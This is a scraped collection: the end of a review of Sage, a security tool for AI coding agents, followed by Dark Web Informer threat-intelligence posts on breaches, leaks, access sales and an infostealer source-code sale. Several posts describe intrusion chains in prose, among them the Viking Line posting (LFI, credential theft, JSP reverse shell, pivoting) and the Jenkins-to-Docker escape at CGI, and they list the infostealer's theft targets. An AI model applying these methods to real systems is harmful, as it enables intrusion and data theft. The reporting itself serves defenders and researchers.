command palette | | OpenClaw | npm package or source | Plugin system | Claude Code installation is the simplest: two commands via the plugin marketplace. Cursor requires building the VSIX from source with `pnpm` and then enabling protection from the command palette. OpenClaw supports installation from npm directly or from source. All three platforms use the same core detection engine under the hood. ## // Privacy Model 🔒 What Stays Local, What Gets Sent Sage sends URL hashes and package hashes to Gen Digital's reputation APIs for cloud-based checking. File content, commands, and source code never leave the machine. Both cloud services can be disabled for fully offline operation using local heuristics only. The privacy model is well-documented and transparent. The cloud components send hashes, not raw data, to Gen Digital's reputation infrastructure. For security-sensitive environments that can't tolerate any external communication, the cloud checks can be disabled entirely, falling back to local YAML-based threat definitions only. This is a reasonable trade-off — cloud reputation databases are significantly more comprehensive, but the local-only mode still provides meaningful protection. ## // Who Built This This comes from **Gen Digital**, the parent company of Avast, Norton, LifeLock, and AVG. That's significant context — this isn't a side project from a random developer. It's a security company with decades of experience in threat detection and reputation systems applying that expertise to a new attack surface: AI coding agents. The URL reputation and package reputation APIs that Sage calls into are backed by Gen Digital's existing threat intelligence infrastructure. ## // Considerations ⚠️ Early Stage Sage is at v0.4.3 with 81 commits. MCP tool call interception is not yet implemented, and custom user threat definitions are not yet supported. This is pre-1.0 software from a major security vendor — expect rapid iteration. **No MCP interception yet.** The most significant current limitation. MCP (Model Context Protocol) tool calls (`mcp__*`) are not yet intercepted, meaning Sage can't guard against malicious operations routed through MCP servers. Given that MCP is becoming the standard integration layer for AI agents, this is a gap that needs closing. **Cloud dependency for full protection.** The strongest detection layer (URL and package reputation) requires calling Gen Digital's cloud APIs. Fully offline operation is supported but offers reduced coverage. Organizations with strict data egress policies will need to evaluate whether hash-based lookups meet their requirements. **Platform coverage.** Currently limited to Claude Code, Cursor/VS Code, and OpenClaw. Other popular agent frameworks (Windsurf, Aider, Continue, etc.) are not yet supported. The monorepo architecture with a shared core engine suggests adding new platforms should be relatively straightforward. **Threat rule licensing.** The source code is Apache-2.0, but the threat detection rules in `threats/` carry a separate "Detection Rule License 1.1." Users should review this license for any restrictions on use or redistribution of the threat definitions. ## // Bottom Line Sage represents a new and increasingly necessary category of security tooling. As AI coding agents gain deeper access to development environments — running shell commands, installing packages, writing files — the attack surface expands significantly. Prompt injection, typosquatted packages, and malicious URLs are real threats that agents are poorly equipped to defend against on their own. Having a major security vendor like Gen Digital invest in this space adds credibility and brings real threat intelligence infrastructure to the problem. The four-layer detection approach (URL reputation, local heuristics, supply-chain checks, plugin scanning) covers the most important attack vectors, and the privacy model is transparent about what data leaves the machine. At 127 stars it's still early, but the backing, the architecture, and the problem it solves make Sage worth watching — and worth installing if you're running AI coding agents in any serious capacity. [ GitHub Repository](https://github.com/avast/sage) [ Documentation](https://ai.gendigital.com/sage) Sage is developed by Gen Digital Inc. (Avast/Norton). The tool sends URL and package hashes to Gen Digital's reputation APIs by default; cloud checks can be disabled for offline operation. ### Azury Infostealer Source Code Sold for $100 With Full Operator Panel, Crypto Wallet Theft, and Keylogging Capabilities URL: https://darkwebinformer.com/azury-infostealer-source-code-sold-for-100-with-full-operator-panel-crypto-wallet-theft-and-keylogging-capabilities/ Last updated: 2026-03-12T19:15:59.000Z Dark Web Informer - Cyber Threat Intelligence # Azury Infostealer Source Code Sold for $100 With Full Operator Panel, Crypto Wallet Theft, and Keylogging Capabilities March 12, 2026 - 6:31:57 PM UTC N/A Malware / Cybercrime Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-12 18:31:57 UTC Threat Actor Jaxx Malware Name Azury Infostealer Language C# Category Malware Source Code Sale Detection Status Semi-FUD Severity High Price $100 (Source Code) Network Open Web Payment Crypto Only ## Incident Overview A threat actor going by Jaxx is selling the complete source code for a C# infostealer called Azury, described as a semi-FUD (fully undetectable) stealer built over two months of development. The package includes the stealer itself and a dedicated C# operator panel for managing infected machines, for $100. The stealer's feature set is extensive and covers nearly every category of sensitive data on a victim's machine. It targets browser data across Chrome, Edge, Opera, Vivaldi, Brave, Yandex, Firefox, and other Chromium and Gecko-based browsers, grabbing saved passwords, cookies, bookmarks, browsing history, credit card autofill entries, and profile configurations. Cryptocurrency wallets and exchange credentials are harvested from desktop wallets like Electrum, Atomic, Exodus, MetaMask, Phantom, and TrustWallet, as well as web-based exchange logins for Binance, Coinbase, Kraken, Gemini, KuCoin, Bybit, and others. The stealer also grabs tokens and session data from messaging platforms including Discord, Telegram, WhatsApp, Slack, Skype, Snapchat, Signal, and more. VPN credentials are harvested from NordVPN, ExpressVPN, ProtonVPN, SurfShark, Mullvad, WireGuard, and over a dozen other providers. Password manager vaults from KeePass, LastPass, Dashlane, 1Password, Bitwarden, NordPass, and others are targeted, along with gaming accounts from Steam, Epic Games, Roblox, and Battle.net. Additional capabilities include keylogging, clipboard monitoring, webcam and microphone capture, arbitrary file collection, persistence mechanisms, and anti-analysis protections including anti-debug, anti-VM, and anti-sandbox measures. Data is exfiltrated as an in-memory ZIP archive via configurable channels like Discord, FTP, or Telegram. ## Stealer Target Categories Browser Data (Passwords, Cookies, Cards) Cryptocurrency Wallets & Exchange Logins Messaging Platform Tokens VPN & Proxy Configurations FTP & File Transfer Credentials Gaming Accounts & Configs Password Manager Vaults System Credentials & RDP Keylogging & Clipboard Monitoring Webcam & Microphone Capture Arbitrary File Collection Persistence & Anti-Analysis ### Claim URL - For Subscribers Only The claim URL and unredacted screenshots for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing Azury infostealer source code for sale with stealer description and operator panel details](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/55138285172695145761.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/55138285172695145761.png) [![Azury infostealer additional features including gaming accounts, password managers, keylogging, and pricing](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/55138285172695145762.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/55138285172695145762.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Full Source Code of Sweden's E-Government Platform Leaked From Compromised CGI Sverige Infrastructure URL: https://darkwebinformer.com/full-source-code-of-swedens-e-government-platform-leaked-from-compromised-cgi-sverige-infrastructure/ Last updated: 2026-03-12T18:36:13.000Z Dark Web Informer - Cyber Threat Intelligence # Full Source Code of Sweden's E-Government Platform Leaked From Compromised CGI Sverige Infrastructure March 12, 2026 - 6:25:21 PM UTC ![Sweden](https://flagcdn.com/20x15/se.png)Sweden Government / IT Services Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-12 18:25:21 UTC Threat Actor ByteToBreach Victim Country ![Sweden](https://flagcdn.com/20x15/se.png)Sweden Industry Government / IT Services Victim Organization CGI Sverige AB Affected Platform Sweden E-Gov Platform Category Source Code Leak Severity Critical Network Open Web Price Free (Source Code) ## Incident Overview A threat actor going by ByteToBreach has leaked the entire source code of Sweden's E-Government platform, claiming it was obtained through a heavily compromised CGI Sverige AB infrastructure. CGI Sverige is the Swedish subsidiary of global IT services giant CGI Group and manages critical government digital services. This is the same actor behind the Viking Line breach posted yesterday. The actor emphasizes this is the full E-Gov platform source code and not just configuration snippets. They state that the Swedish e-government is the most affected party, and note that citizen PII databases and electronic signing documents were also collected but are being sold separately. A staff database, API document signing system, RCE test endpoints, initial foothold details, jailbreak artifacts, and Jenkins SSH pivot credentials are all included in the listing alongside the source code. The disclosed vulnerabilities used in the attack include a full Jenkins compromise, Docker escape via the Jenkins user being in the Docker group, SSH private key pivots, analysis of local .hprof files for reconnaissance, and SQL copy-to-program pivots. The actor makes a pointed note about companies blaming breaches on third parties, explicitly stating that this compromise belongs clearly to CGI infrastructure, referencing Viking Line and Slavia Pojistovna as other examples. The source code is being released for free with multiple backup download links, while citizen databases are sold separately. ## Compromised Data Categories Full E-Gov Platform Source Code Staff Database API Document Signing Systems Jenkins SSH Pivot Credentials RCE Test Endpoints Initial Foothold & Jailbreak Artifacts Citizen PII Databases (Sold Separately) Electronic Signing Documents (Sold Separately) ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing Sweden E-Government platform source code leaked from CGI Sverige infrastructure](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/35216424822626571061.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/35216424822626571061.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Alleged Breach of Austrian Trailer Manufacturer HB Brantner With Customer Data, NDAs, and Confidential Drawings Exfiltrated URL: https://darkwebinformer.com/alleged-breach-of-austrian-trailer-manufacturer-hb-brantner-with-customer-data-ndas-and-confidential-drawings-exfiltrated/ Last updated: 2026-03-12T17:40:08.000Z Dark Web Informer - Cyber Threat Intelligence # Alleged Breach of Austrian Trailer Manufacturer HB Brantner With Customer Data, NDAs, and Confidential Drawings Exfiltrated March 12, 2026 - 5:30:52 PM UTC ![Austria](https://flagcdn.com/20x15/at.png)Austria Manufacturing / Agriculture Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-12 17:30:52 UTC Threat Actor Dreamer8000 Victim Country ![Austria](https://flagcdn.com/20x15/at.png)Austria Industry Manufacturing / Agriculture Victim Organization HB Brantner Victim Site hb-brantner.at Category Data Breach Severity High Network Open Web Total Records Unknown ## Incident Overview A threat actor using the handle Dreamer8000 claims that Hans Brantner & Sohn Fahrzeugbaugesellschaft m.b.H. (HB Brantner), an Austrian manufacturer of heavy-duty agricultural trailers and transport equipment, has suffered a serious breach. The actor has posted the claim on a forum and linked to a dedicated leak blog page with additional details. According to the listing, the attackers exfiltrated a wide range of sensitive materials including customer data, internal emails, non-disclosure agreements (NDAs), vehicle documentation, and confidential drawings and technical files. The threat actor states this is enough information to understand how the company operates and who it works with, suggesting the breach exposed business relationships and proprietary manufacturing details. The actor warns that the potential impact extends beyond HB Brantner itself, potentially affecting partners, customers, employees, and contractors who shared sensitive documents with the company. ## Compromised Data Categories Customer Data Internal Emails Non-Disclosure Agreements (NDAs) Vehicle Documentation Confidential Drawings & Technical Files ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing HB Brantner breach with customer data, NDAs, and confidential drawings exfiltrated](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/91821191452233261857.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/91821191452233261857.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### 26,500 Exposed IoT Devices and 3,000 RTSP Cameras in Saudi Arabia Listed for Free Download URL: https://darkwebinformer.com/26-500-exposed-iot-devices-and-3-000-rtsp-cameras-in-saudi-arabia-listed-for-free-download/ Last updated: 2026-03-12T18:36:20.000Z Dark Web Informer - Cyber Threat Intelligence # 26,500 Exposed IoT Devices and 3,000 RTSP Cameras in Saudi Arabia Listed for Free Download March 12, 2026 - 1:58:45 PM UTC ![Saudi Arabia](https://flagcdn.com/20x15/sa.png)Saudi Arabia IoT / Infrastructure Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-12 13:58:45 UTC Threat Actor CVDEAD Target Country ![Saudi Arabia](https://flagcdn.com/20x15/sa.png)Saudi Arabia Industry IoT / Infrastructure IoT Devices 26,500 RTSP Cameras 3,000 Category IoT Exposure Severity High Network Open Web Price Free ## Incident Overview A threat actor using the handle CVDEAD has shared a curated dataset of 26,500 publicly accessible IoT devices and 3,000 RTSP camera streams located within Saudi Arabia's infrastructure. The dataset is being offered as a free download, and the actor explicitly encourages using the exposed devices as DDoS botnet soldiers or as proxies for anonymized traffic routing. The listed device types span a wide range of IoT infrastructure including medical devices, routers, camera streaming systems, local servers, ACME services, sensors, and administration interfaces. The actor notes that most of these devices expose their video streams via RTSP (both protected and unprotected) and are vulnerable due to the use of unsecured protocols. The inclusion of medical devices in the list is particularly concerning, as compromised medical IoT could have real-world safety implications. A sample was posted in the listing showing what appears to be structured data with IP addresses, ports, and device information. The dataset appears to be the result of active scanning and enumeration of Saudi Arabian IP ranges, compiled into an actionable target list for exploitation. ## Exposed Device Categories Medical Devices Routers Camera Streaming Systems RTSP Video Streams (3,000) Local Servers ACME Services Sensors Administration Interfaces ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing 26,500 exposed IoT devices and 3,000 RTSP cameras in Saudi Arabia](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/82269640194392427545.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/82269640194392427545.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Daily Dose of Dark Web Informer - March 11th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-march-11th-2026/ Last updated: 2026-03-11T22:42:25.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **35,800+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 35.8k Unique Visitors 89.3k Pageviews Last 30 days as of Mar 2, 2026\. Next update Mar 31st. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Website Posts ❗️ [Threat Actor Selling Root Access to South Korean Government Server With Lateral Movement to 42 Internal Hosts](https://darkwebinformer.com/threat-actor-selling-root-access-to-south-korean-government-server-with-lateral-movement-to-42-internal-hosts/) FREE ❗️ [Viking Line Ferries Allegedly Breached With Full Passenger Database and Payment Data Leaked](https://darkwebinformer.com/viking-line-ferries-allegedly-breached-with-full-passenger-database-and-payment-data-leaked/) FREE X/Twitter Updates 💡 [Cloudflare just built different, literally.](https://x.com/DarkWebInformer/status/2031544303265395072?s=20) ❗️ [A threat actor announces the hacking of GlobalNet, a Tunisian internet and telecommunications provider, claiming to have extracted the company's databases and gained access to internal systems, subdomains, and employee branches.](https://x.com/DarkWebInformer/status/2031720657608671500?s=20) ❗️ [A threat actor is allegedly selling 3,000 Australian Ledger customer leads from a private source.](https://x.com/DarkWebInformer/status/2031723751675470277?s=20) ❗️ [A threat actor is selling "SupaGuard," an automated vulnerability scanner panel designed to scan for exposed Supabase instances, .env files, crypto private keys, crypto seeds, and custom directories.](https://x.com/DarkWebInformer/status/2031728079739982257?s=20) 💡 [Google just completed a $32 billion acquisition of Israeli cybersecurity firm Wiz](https://x.com/DarkWebInformer/status/2031731223798648848?s=20) ❗️ [A threat actor is allegedly selling full access to a Brazilian Police investigation panel and law enforcement webmail from São Paulo's Civil Police (Polícia Civil do Estado de São Paulo).](https://x.com/DarkWebInformer/status/2031733954227712197?s=20) ❗️ [A threat actor is allegedly selling full network access to a cargo bike retailer based in Milan, Italy.](https://x.com/DarkWebInformer/status/2031738792474796209?s=20) ❗️ [Shlomo Insurance has fallen victim to Kill Security Ransomware](https://x.com/DarkWebInformer/status/2031741525659357257?s=20) ❗️ [A threat actor is allegedly selling a Spanish IBAN leads database containing 8,145,987 lines.](https://x.com/DarkWebInformer/status/2031744205555450129?s=20) ❗️ [A threat actor is allegedly selling a bundle of 19 corporate accesses targeting companies across Spain, UK, Brazil, Guatemala, Mexico, and India.](https://x.com/DarkWebInformer/status/2031757292115251457?s=20) ❗️ [Colegio Retamar has fallen victim to Qilin Ransomware](https://x.com/DarkWebInformer/status/2031760271413235944?s=20) ❗️ [Stryker is currently offline due to a wiper malware attack by Handala.](https://x.com/DarkWebInformer/status/2031790309936447510?s=20) ❗️ [Handala has confirmed an attack on Verifone, a global payments technology company.](https://x.com/DarkWebInformer/status/2031796934680182943?s=20) 💡 [What Makes Israel So Good at Hacking?](https://x.com/DarkWebInformer/status/2031812497775202684?s=20) ❗️ [Coinbase Cartel Claims Staples as a victim](https://x.com/DarkWebInformer/status/2031835544942940332?s=20) 💡 [Stryker has filed form 8-K due to a cybersecurity incident](https://x.com/DarkWebInformer/status/2031847048333435092?s=20) ❗️ [Arimex Importadora has been claimed a victim to Qilin Ransomware](https://x.com/DarkWebInformer/status/2031850688867655867?s=20) ❗️ [Aura Group, Inc is on the Shiny clock.](https://x.com/DarkWebInformer/status/2031857940232053185?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Viking Line Ferries Allegedly Breached With Full Passenger Database and Payment Data Leaked URL: https://darkwebinformer.com/viking-line-ferries-allegedly-breached-with-full-passenger-database-and-payment-data-leaked/ Last updated: 2026-03-11T16:07:11.000Z Dark Web Informer - Cyber Threat Intelligence # Viking Line Ferries Allegedly Breached With Full Passenger Database and Payment Data Leaked March 11, 2026 - 2:46:18 PM UTC ![Finland](https://flagcdn.com/20x15/fi.png)Finland Transportation / Maritime Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-11 14:46:18 UTC Threat Actor bytetobreach Victim Country ![Finland](https://flagcdn.com/20x15/fi.png)Finland Industry Transportation / Maritime Victim Organization Viking Line Victim Site vikingline.com Category Data Breach Severity Critical Network Open Web Total Records Unknown ## Incident Overview A threat actor going by bytetobreach claims to have breached Viking Line, a major Finnish ferry transportation company operating in the Baltic Sea. The actor says they have extracted a complete database of traveler personal information, including vehicle registration plates, and has made the data available for free download with multiple backup links. A second complementary database was also compiled through the NetAxept payment API, which is used by companies for processing payments at onboard restaurants and services during ferry journeys. The actor says this database correlates passenger identities with transaction data from all Viking Line ships. The actor notes that a routine check on the passenger data shows above-average wealth profiles, mentioning a Finnish filmmaker found among the first entries as an example. The threat actor also detailed the attack chain used to gain access: exploiting a Solr LFI vulnerability dating back to 2021 to grab Tomcat credentials, uploading a reverse shell via JSP, then using the same Tomcat credentials to pivot to the master server, followed by abuse of the NetAxept payment integration. The listing includes redacted database links, LFI paths, initial foothold details, frontend/backend access, and system accounts. ## Compromised Data Categories Traveler Personal Information Vehicle Registration Plates Onboard Payment Transaction Data Restaurant & Service Purchase History Passenger-to-Ship Correlation Data System Accounts & Credentials Frontend/Backend Access ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing Viking Line Ferries breach with passenger database and payment data](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/88495604302619851312.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/88495604302619851312.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Threat Actor Selling Root Access to South Korean Government Server With Lateral Movement to 42 Internal Hosts URL: https://darkwebinformer.com/threat-actor-selling-root-access-to-south-korean-government-server-with-lateral-movement-to-42-internal-hosts/ Last updated: 2026-03-11T16:07:18.000Z Dark Web Informer - Cyber Threat Intelligence # Threat Actor Selling Root Access to South Korean Government Server With Lateral Movement to 42 Internal Hosts March 11, 2026 - 11:32:55 AM UTC ![South Korea](https://flagcdn.com/20x15/kr.png)South Korea Government Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-03-11 11:32:55 UTC Threat Actor zSenior Victim Country ![South Korea](https://flagcdn.com/20x15/kr.png)South Korea Industry Government Victim Domain \*.go.kr Access Level Root Category Initial Access Severity Critical Network Open Web Price Waiting Offers ## Incident Overview A threat actor operating under the handle zSenior is selling root-level access to a South Korean government server hosted on a \*.go.kr domain, the official top-level domain reserved for South Korean government agencies. The actor claims to have completed full privilege escalation and states that pivoting to 42 internal live hosts from the compromised server should be straightforward. Beyond the initial root access, the actor reports having obtained PostgreSQL database superuser access on a second internal server at 192.168.0.147, which they describe as containing PII. They also believe this secondary server may be vulnerable to remote code execution, further expanding the potential attack surface. The compromised server is running CentOS and has been online continuously for 1,642 days, with disk usage showing a 50GB root partition and a 142GB home partition at 55% capacity. The actor emphasizes they are selling full access only and explicitly states this is not for traffic, database, or malware distribution. Proof is available upon request, pricing is open to offers, and escrow is accepted. This represents a significant national security concern given the government domain and the extensive lateral movement potential across dozens of internal systems. ### Claim URL - For Subscribers Only The claim URL for this listing can be found on the **Threat Feed** or **Ransomware Feed** for subscribers. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Image Preview [![Forum listing showing root access to South Korean government server for sale with lateral movement to 42 internal hosts](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/39387827165773573299.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/03/39387827165773573299.png) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Daily Dose of Dark Web Informer - March 10th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-march-10th-2026/ Last updated: 2026-03-10T22:48:36.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **35,800+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 35.8k Unique Visitors 89.3k Pageviews Last 30 days as of Mar 2, 2026\. Next update Mar 31st. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) 💚 ## Support Dark Web Informer Contributions help continue monitoring threats and keeping the community informed. 🟠 MoneroXMR 89Z68A33B9sNRf941f5GczU4ZzarTQsWn6dyMVUbo6mk2zYEamh9hALH1odMiVZfynKhjKPS58ASAfDyFdTW9o29Mwf4ArZ Copied 🟡 BitcoinBTC bc1qvs4pfwascp2uln90g3e3l4agnhnjrdn2t578we Copied 🔷 EthereumETH / ERC-20 / USDT 0xbA6bCf2BF50F9789504401AFbf19E8c2CCaa773D Copied Click address to copy · ETH address accepts USDT, USDC, and other ERC-20 tokens ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Website Posts 📰 [India's NCB Dismantles "Team Kalki" Darknet Drug Network After Seizing ₹5 Crore ($580,000 USD) in Narcotics](https://darkwebinformer.com/indias-ncb-dismantles-team-kalki-darknet-drug-network-after-seizing-%e2%82%b95-crore-580000-usd-in-narcotics/) FREE ❗️ [Alleged Sale of 150,000 Patient Records From US Clinic Including SSNs, Diagnoses, and Medications](https://darkwebinformer.com/alleged-sale-of-150000-patient-records-from-us-clinic-including-ssns-diagnoses-and-medications/) FREE ❗️ [Alleged Leak of Spanish Ministry of Finance Employee Data Including IDs, IBANs, and Personal Information](https://darkwebinformer.com/alleged-leak-of-spanish-ministry-of-finance-employee-data-including-ids-ibans-and-personal-information/) FREE ❗️ [Alleged Sale of 1.8 Million Patient Records From Maple Respiratory Colombia Including Full Medical History](https://darkwebinformer.com/alleged-sale-of-1-8-million-patient-records-from-maple-respiratory-colombia-including-full-medical-history/) FREE X/Twitter Updates 💡 [The new FBI Watchdog update](https://x.com/DarkWebInformer/status/2031156896996950511?s=20) ❗️ [A threat actor claims to have leaked data from Instituto de Capacitación para el Trabajo del Estado de Sonora (ICATSON).](https://x.com/DarkWebInformer/status/2031355585631768856?s=20) ❗️ [A threat actor claims to have leaked data from TicketToGo.](https://x.com/DarkWebInformer/status/2031364674956955966?s=20) 💡 [Cybersecurity](https://x.com/DarkWebInformer/status/2031368871068779000?s=20) ❗️ [A threat actor is allegedly selling data from Hospital Universitario del Valle, a public university hospital in Cali, Colombia, containing 264,454 lines and documents (\~25 GB) of personal information.](https://x.com/DarkWebInformer/status/2031380238895026177?s=20) ❗️ [A threat actor claims to have leaked customers personal data from an unidentified Mexican manufacturing company.](https://x.com/DarkWebInformer/status/2031384935055954082?s=20) ❗️ [A threat actor claims to have had access to the Internal Security Forces of Qatar (Lekhwiya) and is allegedly selling personnel data of 1,900+ security force members.](https://x.com/DarkWebInformer/status/2031390640970367027?s=20) ❗️ [A threat actor is allegedly selling 15 million passenger records (\~50 GB) from Jazeera Airways, a Kuwaiti low-cost airline.](https://x.com/DarkWebInformer/status/2031394309333750135?s=20) ❗️ [A threat actor claims to have extracted databases from Universidad Mayor de San Simón (UMSS) in Bolivia, allegedly exposing millions of records with sensitive information.](https://x.com/DarkWebInformer/status/2031396892945326295?s=20) ❗️ [A threat actor claims to have leaked data from Segway-Ninebot, a global leader in personal micro-mobility solutions and robotics, serving millions of users across 160+ countries.](https://x.com/DarkWebInformer/status/2031401946502791668?s=20) ❗️ [Rafael Advanced Defense Systems was targeted by BD Anonymous](https://x.com/DarkWebInformer/status/2031405506326126744?s=20) 💡 [Apologies, my previous post on the zero-days was incorrect and I read it entirely wrong.](https://x.com/DarkWebInformer/status/2031432439730417701?s=20) 💡 [Lol, truth!](https://x.com/DarkWebInformer/status/2031434531773771880?s=20) 💡 [Havoc: A modern and malleable post-exploitation command and control framework](https://x.com/DarkWebInformer/status/2031485924459045221?s=20) 